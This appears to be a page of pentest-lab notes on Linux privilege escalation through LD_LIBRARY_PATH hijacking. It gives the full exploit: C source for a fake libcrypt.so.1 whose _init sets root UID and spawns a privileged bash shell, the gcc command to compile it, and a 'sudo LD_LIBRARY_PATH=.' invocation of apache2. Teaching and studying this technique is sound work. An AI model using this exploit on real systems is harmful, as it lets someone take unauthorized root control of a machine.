LD_LIBRARY_PATH

The LD_LIBRARY_PATH environment variable contains a set of directories where shared libraries are searched for first.

The ldd command can be used to print the shared libraries used by a program:

`ldd /usr/sbin/apache2`

By creating a shared library with the same name as one used by a program, and setting LD_LIBRARY_PATH to its parent directory, the program will load our shared library instead.

Run ldd against the apache2 program file:

`ldd /usr/sbin/apache2`

Hijacking shared objects using this method is hit or miss. Choose one from the list and try it (libcrypt.so.1 seems to work well).

Create a file (library_path.c) with the following contents:

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setresuid(0,0,0);
system("/bin/bash -p");
}

Compile library_path.c into libcrypt.so.1:

`gcc -o libcrypt.so.1 -shared -fPIC library_path.c`

Run apache2 using sudo, while setting the LD_LIBRARY_PATH environment variable to the current path (where we compiled library_path.c):

`sudo LD_LIBRARY_PATH=. apache2`

PreviousEnvironment Variables NextLD_PRELOAD

Last updated 2 years ago